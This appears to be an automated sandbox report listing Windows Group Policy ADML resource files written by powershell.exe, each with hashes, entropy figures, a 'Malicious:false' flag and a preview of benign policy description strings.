                                                                                                                                                                                                        SHA-512:2B27F8DA69CDFB4423C954DC402FD7234C9F462E849F2687FFFD9E00CDEF23FF5EFA8D7A59E7640BAFC96633C0929A0136F5DCED52CA1ECD8ED2C15FBA8D1DC7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DisplayLastLogonInfoDescription">Display information about previous logons during user logon</string>.. <string id="DisplayLastLogonInfoDescription_Help">This policy setting controls whether or not the system displays information about previous logons and logon failures to the user.....For local user accounts and domain user accounts in domains of at least a Windows Server 2008 functional level, if you enable this setting, a message appears after the user logs on that displays the date and time of the last suc
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):7341
                                                                                                                                                                                                        Entropy (8bit):5.050859952546844
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:7t/qF4BH/2pten9EVDEVhclKekhlJDnfQn:8bAeYlJDnU
                                                                                                                                                                                                        MD5:091AE0EC426BBE821C7C4A313FA3E5A5
                                                                                                                                                                                                        SHA1:013191A0FEF6551C71BCBD5823D0DC6C02867906
                                                                                                                                                                                                        SHA-256:FD871C109B4BE893167D85E6C37792B70E2F251DDB9370D039161E3FE735BDCC
                                                                                                                                                                                                        SHA-512:9971AB9D1272594663E6BDEC25110E6116B39C5101C70177ED846E3D4D78A8FE8F23326D559B0D420404D1ADE94AD93FC774000A6B1B372583D54863F5B34A72
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions" revision="1.0" schemaVersion="1.0">.. <displayName>Windows Vista base categories and supported component definitions</displayName>.. <description>This file contains all the base categories and supported component definitions used by operating system components.</description>.... <resources>.. <stringTable>.. <string id="SUPPORTED_WindowsVistaOrServer2008Only">Windows Server 2008 and Windows Vista</string>.. <string id="SUPPORTED_AllowWebPrinting">Windows 2000 or later, running IIS. Not supported on Windows Server 2003.</string>.. <string id="SUPPORTED_IE6SP1">At least Internet Explorer 6 Service Pack 1</string>.. <string id="SUPPORTED_Win2k">At least Windows 2000</string>.. <s
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1059
                                                                                                                                                                                                        Entropy (8bit):5.0665762842091135
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yFvHzJCFEpFlurFV:cgeD5x8gm8fKeLoFalurFV
                                                                                                                                                                                                        MD5:42A08790F9D22D63FC6D832BC97CAB7C
                                                                                                                                                                                                        SHA1:1EAADF4115A41993AEA94D99AD23034C88DA243B
                                                                                                                                                                                                        SHA-256:38866CDAD4284842C711350A8E5E9A0E3743B21BB66F0D849073FD73D4137A0F
                                                                                                                                                                                                        SHA-512:4DC9EC52BE0CA470CCAE39A62E6674610151BDA10395874548A47036EDF72C861A016D66B3ED38A1892BCB17B3A67A3371B6D29C7A1B37B76321064B6A81288D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WAU">Add features to Windows 8.1</string>.. <string id="WAU_Help">Contains settings to control the behavior of the Add features to Windows 8.1 wizard.</string>.. <string id="DisableWAU">Prevent the wizard from running.</string>.. <string id="DisableWAU_Help">By default, Add features to Windows 8.1 is available for all administrators. ....If you enable this policy setting, the wizard will not run.....If you disable this policy setting or set it to Not Configured, the wizard will run.</string>.. </s
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3483
                                                                                                                                                                                                        Entropy (8bit):4.819976484985464
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cgeD5J8FGj3Hzx+h1Pi1DjP3xYPXUrP/bFV:LeD5OuLFV
                                                                                                                                                                                                        MD5:8015A772382BE975C6E6145B1A25F71A
                                                                                                                                                                                                        SHA1:4B8773056C6F34C2BF2463E2FC9C346BA73BB221
                                                                                                                                                                                                        SHA-256:33A81CBC22929DB64640E0DA5046F30634F5B9DC9271F9601CA7ABCBC0E656D7
                                                                                                                                                                                                        SHA-512:61C05CEEC442EB66BFFC11ED4D303D15A15E5D385B62D7118EC3354FB07CDE6EB95A6A98D3828BB213122C98606333B7A7EF72B4719B79D3B07175D50FF3DA8D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Windows Backup</displayName>.. <description>Windows Backup</description>.. <resources>.. <stringTable>.. <string id="AllowOnlySystemBackup">Allow only system backup</string>.. <string id="AllowOnlySystemBackupExplain">This policy setting allows you to manage whether backups of only system volumes is allowed or both OS and data volumes can be backed up.....If you enable this policy setting, machine administrator/backup operator can backup only volumes hosting OS components and no data only volumes can be backed up.If you disable or do not configure this policy setting, backups can include both system or data volumes.</string>.. <string i
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1427
                                                                                                                                                                                                        Entropy (8bit):4.84683359240417
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dgeD5eo8gWt4+3Fbef61ymLYLQqTKjUW3gHU5Xyp7lvW8/pV0FV:cgeD5x8gm8fKuTcgeiTD0FV
                                                                                                                                                                                                        MD5:39EDDC1EBA0C76841D195659381A44B5
                                                                                                                                                                                                        SHA1:3ED545728FAE06E6C94B15B443EE3CCBFED6B902
                                                                                                                                                                                                        SHA-256:DFF8FE621764236769B2C17AEC64C4A8496DD967CF2D3EB9E2F8103BD503E12C
                                                                                                                                                                                                        SHA-512:7A44DF7BF6E10E7985CD401D69C2361C888FF5D8CCE151C50DA871AD5F680A4EE5ED1941958014BD91FD45E0B5E6C84B6BD77467D9B6D1F197A2BA8096D17EA9
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ProhibitChangingInstalledProfileList">Prohibit installing or uninstalling color profiles</string>.. <string id="ProhibitChangingInstalledProfileListExplain">This policy setting affects the ability of users to install or uninstall color profiles.....If you enable this policy setting, users cannot install new color profiles or uninstall previously installed color profiles.....If you disable or do not configure this policy setting, all users can install new color profiles. Standard users can uninstall color profi
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (333), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3410
                                                                                                                                                                                                        Entropy (8bit):5.029780460475183
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LeD5pmCEXQ8gCBmXrmlBGx9HuT5nF2Uxt8IoV:EbEXQ8gCBmXrmMuT5F2Uxt8F
                                                                                                                                                                                                        MD5:7FDE7C285C5BFBCD2E562DB3F37096EC
                                                                                                                                                                                                        SHA1:FE32189EE6438FF319BDD9C79FFFDEEF158BA977
                                                                                                                                                                                                        SHA-256:1471ACA2B4BCD0A4D5BF43330741CC0314A243DE0757DB0383452A7C473E1644
                                                                                                                                                                                                        SHA-512:9C1C72D90D5F03399C6AB11029EEE9EB13B897723ED636094AE1565F5E55D4BF9F468A4F93E6BC45C5FA1C135DA0351E5EE2C3372A12C558607230ECC65E78B6
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WCN_Category">Windows Connect Now</string>.. <string id="WCN_DisableWcnUi">Prohibit access of the Windows Connect Now wizards</string>.. <string id="WCN_DisableWcnUi_Help">This policy setting prohibits access to Windows Connect Now (WCN) wizards. ....If you enable this policy setting, the wizards are turned off and users have no access to any of the wizard tasks. All the configuration related tasks, including "Set up a wireless router or access point" and "Add a wireless device" are disabled. ....If you d
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (733), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):75437
                                                                                                                                                                                                        Entropy (8bit):4.739020696864297
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:UtkTlKxkN82stKz65oqibddrfPaeq6wEqx2xkN8AAS2VHU/2:UWBD82noaTrfPae62xy8AASD2
                                                                                                                                                                                                        MD5:F1A80F0C326A0FDE6917DD3AD03C6561
                                                                                                                                                                                                        SHA1:C014384966DEF2C68671E9BED95371447D96FA77
                                                                                                                                                                                                        SHA-256:03DD8B1E813023915A4F0143749E9CE752F81EDB973D4071CA522A03028CE619
                                                                                                                                                                                                        SHA-512:5FC276B7F1A8D8C3AE163910007405CB38108F5728EE9A2FAE74DD134FCDF3972BA4D46905650C252C96A18BFB781564A626621DAD7F9AFF49BC9D6751399A16
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AntiSpyware">Windows Defender</string>.. <string id="Exclusions">Exclusions</string>.. <string id="NetworkRealtimeInspection">Network Inspection System</string>.. <string id="NetworkRealtimeInspection_Exclusions">Network Inspection System Exclusions</string>.. <string id="Quarantine">Quarantine</string>.. <string id="RealtimeProtection">Real-time Protection</string>.. <string id="Remediation">Remediation</string>.. <string id="Reporting">Reporting</string>.. <string id="Scan">Scan</string>.. <string id="SignatureUpdate">Signature Updates</string>..
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (989), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):57954
                                                                                                                                                                                                        Entropy (8bit):4.692320082638433
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:hctuJMsDha+k7JlgKVrag8E09FlZ9mzQNkQZZZaQZQP2BQvYIsyYiq:hpg8TluE5BQv5syYiq
                                                                                                                                                                                                        MD5:C1FBABFE3BC28D72CEB06DABDD8DCDDA
                                                                                                                                                                                                        SHA1:74660612AAE1056EBDB1DCBBE4D93AA163558AB4
                                                                                                                                                                                                        SHA-256:D350F2161317CCA32AD7BB4D6CF369F3AA81467122855F9FA8B8B0BA15F14893
                                                                                                                                                                                                        SHA-512:EC3B8C1449B89C5981CEC9D3F2072AD66D2C92FAC2336365C341959FF9AB60B60083C39D1413217B4F07FFEE3389B4C6DCFFF5B7A7F38EE781A934212F5A1A66
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ABCDOnly">Restrict A, B, C and D drives only</string>.. <string id="ABConly">Restrict A, B and C drives only</string>.. <string id="ABOnly">Restrict A and B drives only</string>.. <string id="ALLDrives">Restrict all drives</string>.. <string id="ClassicShell">Turn on Classic Shell</string>.. <string id="ClassicShell_Help">This setting allows an administrator to revert specific Windows Shell behavior to classic Shell behavior.....If you enable this setting, users cannot configure their syste
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4257
                                                                                                                                                                                                        Entropy (8bit):4.850396400130338
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LeD5pm1WXTuo/WBDr5RCutnwFBTb8WEMa3GUiKV:EQVJtwV3Zahi+
                                                                                                                                                                                                        MD5:2652912F37E3671937BB50F97C05FADF
                                                                                                                                                                                                        SHA1:F1B96B528263077B0DD66B9C004E923EAA71C6E8
                                                                                                                                                                                                        SHA-256:D7293FB074E7098858E2090DB60C7E3A8DC96FA062FACBABDA34AF48C57A4A8A
                                                                                                                                                                                                        SHA-512:F462F5F732207EFB517FAB537A556A80BD8BFE80302EBAF9436E34B3788ADF2907F53D08AF871D57EDD03D2C457ECC709320F7DC7F0D33F68F4E2254C111A9AF
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WFP">Windows File Protection</string>.. <string id="WFPDllCacheDir">Specify Windows File Protection cache location</string>.. <string id="WFPDllCacheDir_Help">This policy setting specifies an alternate location for the Windows File Protection cache.....If you enable this policy setting, enter the fully qualified local path to the new location in the "Cache file path" box.....If you disable this setting or do not configure it, the Windows File Protection cache is located in the %Systemroot%\System32\Dllcac
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (1085), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43147
                                                                                                                                                                                                        Entropy (8bit):4.809526069081037
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:1OHZuj3f3oPzINNKREqPRLHN83hOzwPvW+0NQkAV2ld0lrlBjSMDt3sKaT7c7cA:Z3jNNsohbvW+0NQkAV2ld0lrlB7
                                                                                                                                                                                                        MD5:0DDDC70E928C3191D6DB487772FCDDD6
                                                                                                                                                                                                        SHA1:124DCC7A766E35E7B8BD9C3EF6C5E62A447F6282
                                                                                                                                                                                                        SHA-256:5625F229BC2CE0518F0689C32B02F208D1B160274D5C9AC00707A15FD4F254AB
                                                                                                                                                                                                        SHA-512:BF17199483BB0DA38AEA1B64BC98CDED7F000B264BC45444423AC60D710E5855445BEB097523D28FB305E82824B75A4C76F99BA4488D9FA22754853A0BBDC073
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WF_AllowedPrograms_Help">Allows you to view and change the program exceptions list defined by Group Policy. Windows Firewall uses two program exception lists: one is defined by Group Policy settings and the other is defined by the Windows Firewall component in Control Panel.....If you enable this policy setting, you can view and change the program exceptions list defined by Group Policy. If you add a program to this list and set its status to Enabled, that program can receive unsolicited incoming messages on any po
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1162
                                                                                                                                                                                                        Entropy (8bit):4.9740818694409095
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dgeD5eo8gWt4+3Fbef61ynrrl8q+O0jSBC7knRupMRud+FV:cgeD5x8gm8fKs2q2SA7aoMzFV
                                                                                                                                                                                                        MD5:2CDED79A2DD5C6D41BFAA7567008F5CD
                                                                                                                                                                                                        SHA1:EC6C5B95AF0DC5559BD8013B3150600AFDCEEEBF
                                                                                                                                                                                                        SHA-256:9C7A2043D9D255F11092CE1303ABFD599BBEFC4459D1C87308D4738E2E7225A2
                                                                                                                                                                                                        SHA-512:C78FC573B695F8C1AE28056E1A19D80EBCB840D8FC7576353E50951043BC4E2F2E020DB9AE1BF2B81F53DF936E34C40BD1B84322F117B898E01B128D01BE1A33
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="TurnOffCommunities">Turn off the communities features</string>.. <string id="TurnOffCommunities_help">Windows Mail will not check your newsgroup servers for Communities support.</string>.. <string id="TurnOffWindowsMail">Turn off Windows Mail application</string>.. <string id="WindowsMail">Windows Mail</string>.. <string id="WindowsMail_help">Denies or allows access to the Windows Mail application.....If you enable this setting, access to the Windows Mail application is denied.....If you disable
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (432), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1636
                                                                                                                                                                                                        Entropy (8bit):4.844281894305683
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cgeD5x8gm8fKmlUrPmP6TuZY4UG4c2SDlSFV:LeD5pm6lY1TuCG4IDUFV
                                                                                                                                                                                                        MD5:0BEF85C5A51F0980D97B8F87CC124C6B
                                                                                                                                                                                                        SHA1:72C086550C97C4E87B55D7171AA36E1EA33F1371
                                                                                                                                                                                                        SHA-256:EEFF3058ED45FA9E18846EE53BE4EF621B20BA2D7BB4535A81CDBF8066604E68
                                                                                                                                                                                                        SHA-512:CDD4647BC6B6CE9A3F1ED741C0929C1C768F0E4AF1B2DE27D7C161153CA744117FC34CFEF91C5DC72EDB8AE7FAD91C95F5125E90F2F02ACC27796A37B6E9B190
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DisableOnline">Prevent Windows Media DRM Internet Access</string>.. <string id="DisableOnlineExplain">Prevents Windows Media Digital Rights Management (DRM) from accessing the Internet (or intranet).....When enabled, Windows Media DRM is prevented from accessing the Internet (or intranet) for license acquisition and security upgrades.....When this policy is enabled, programs are not able to acquire licenses for secure content, upgrade Windows Media DRM security components, or restore backed up content licenses
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (560), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
Size (bytes):22067
Entropy (8bit):4.725628900708413
Encrypted:false
SSDEEP:384:mndYKgb1n1M2UKzDSLikfF6vkRssT0vdtUL607p7aH:cbu3kQDGfFRsY0vQB7pc
MD5:2E98C6915989DDC7243EFCC53275A5FC
SHA1:D83FCE256850CA49F4F58F3D6DE0EFA6F1524B03
SHA-256:AC668C6094254BED8D12F1BF3B6D8E60B552C288ACF47FAB101AB889BA9D824E
SHA-512:D03A54A7ECB7186CDAE5EE39795F9B688C3E193847D0ED0F15CDF3EFC70077DDF2E572A2A5996641A000C4BECCF6C3E090A21FDEFB2D38B996EFF1D9F4771458
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Autodetect">Autodetect</string>.. <string id="ConfigureHTTPProxySettings">Configure HTTP Proxy</string>.. <string id="ConfigureHTTPProxySettingsExplain">This policy setting allows you to specify the HTTP proxy settings for Windows Media Player.....If you enable this policy setting, select one of the following proxy types:....- Autodetect: the proxy settings are automatically detected...- Custom: unique proxy settings are used...- Use browser proxy settings: browser's proxy settings are used.....If the Cus
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):2609
Entropy (8bit):4.83243600779635
Encrypted:false
SSDEEP:48:cgeD5x8gm8fKurmiSL30cT3cCtwpYS3tyLmHI+P25YS3t3zdFV:LeD5pmD7TMSy2FV
MD5:3B589ADE17CCE578D294FF56D65F5321
SHA1:3885D1E98889369FCDF0570B76601B0EEAAEED09
SHA-256:BA36F02C4F20E6A6075C3091D0FD5BC81F6589552889FE4055C4BD90831A7699
SHA-512:4BA6FE1BFB1209B03EA09ADDC64C288D9F076CD72EF968517E12A60AB8EC2060EF877D268ADA856D1B5BD4AA55CAE784D95F033FA839B66A84A039F8F0EFA206
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WinMSG_NoAutoStartWindowsMsg_Comp">Do not automatically start Windows Messenger initially</string>.. <string id="WinMSG_NoAutoStartWindowsMsg_Help">This policy setting prevents Windows Messenger from automatically running at logon. ....If you enable this policy setting, Windows Messenger is not loaded automatically when a user logs on.....If you disable or do not configure this policy setting, Windows Messenger will be loaded automatically at logon.....Note: This policy setting simply prevents Windows Messenge
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):5639
Entropy (8bit):4.939572011046928
Encrypted:false
SSDEEP:96:LeD5a2Uy2oPZVH9GQPVtmkPl7Q6sP9dBIP0KP6bLPbxTPJiPG5CP5ubPbDyG7kWq:ENPnOXiVyZcNmTDxun
MD5:14C496DDE1D1ACC8B3809CF194122870
SHA1:4A500C7707FD2791A0118C078D5113B0EF4A2844
SHA-256:C662D7E4BF2848728B8F335734CB6500C40E88727F1ABFABCD1E097B4C6B4FB3
SHA-512:5FF521B1B1A903132003B2F20BE3502BA69388D8A9839EB4B8485B56EFB71751B0B69AFC0AF56B0601910A685CE4025F43930A1C24FCD8DDB585A8E17AD35760
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions" revision="1.0" schemaVersion="1.0">.. <displayName>Windows Vista products table</displayName>.. <description>This file contains all the product definitions used in supported on definitions.</description>.... <resources>.. <stringTable>.. Microsoft Windows -->.. <string id="MicrosoftWindows">Windows operating system</string>.. <string id="MicrosoftWindows2000">Windows 2000 operating systems</string>.. <string id="MicrosoftWindows2000_RTM">Windows 2000</string>.. <string id="MicrosoftWindows2000_SP1">Windows 2000 Service Pack 1</string>.. <string id="MicrosoftWindows2000_SP2">Windows 2000 Service Pack 2</string>.. <string id="MicrosoftWindows2000_SP3">Windows 2000
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with very long lines (354), with CRLF line terminators
Category:dropped
Size (bytes):14554
Entropy (8bit):4.769003944604622
Encrypted:false
SSDEEP:192:EGUQ3V7eAfrBxq5L/cPcFS5YCZXGSqHL/LmLlUCEXjNi2+J1+sEG:9tBc5LUPcKYCZXGSqHDLmBcNi2S
MD5:E24B954C1451F81FC8559A0F42D8B804
SHA1:02CDBB99F2546ED8DD467B9799FDA9DECFE1F716
SHA-256:A8B80A925FCC599E485029B1833C58865A6A16D872FB8766F9ACB8A1E0752D93
SHA-512:156521221250B6029798C10A2BF138954280AEE73D34FEFCC6D6B3ABB9399824B9135D76A2F8FF1F975F1818D123E6D56DCAD7655E6D6EC5851E7D661926A802
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AllowAutoConfig">Allow remote server management through WinRM</string>.. <string id="AllowBasic">Allow Basic authentication</string>.. <string id="AllowBasicClientHelp">This policy setting allows you to manage whether the Windows Remote Management (WinRM) client uses Basic authentication.....If you enable this policy setting, the WinRM client uses Basic authentication. If WinRM is configured to use HTTP transport, the user name and password are sent over the network as clear text.....If you disable or do
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):5497
Entropy (8bit):4.839558778753586
Encrypted:false
SSDEEP:96:LeD5pmCfYYOpQgxeUMP5pWuPG47CngUmOuWg9m56V:EBfY/MPCCG4OngUq0o
MD5:157A758A1233F9764CDFFCB79F8ADAB2
SHA1:F1203844E770993418DCB257146C5BF98532F5C0
SHA-256:35C10ECD562212B9C242ABCEA3EECD82965F173B8F8F2A848F1DD94F725EF0A1
SHA-512:8E70D00D0FEA7F5164EC8BA0FF8B7F548A76A830DA19094827590D46399C4A1F5E21AA2054B5637F1C91095957DE1610C28BCC3974ED3FB36BE3ED6F2D067D45
Malicious:false
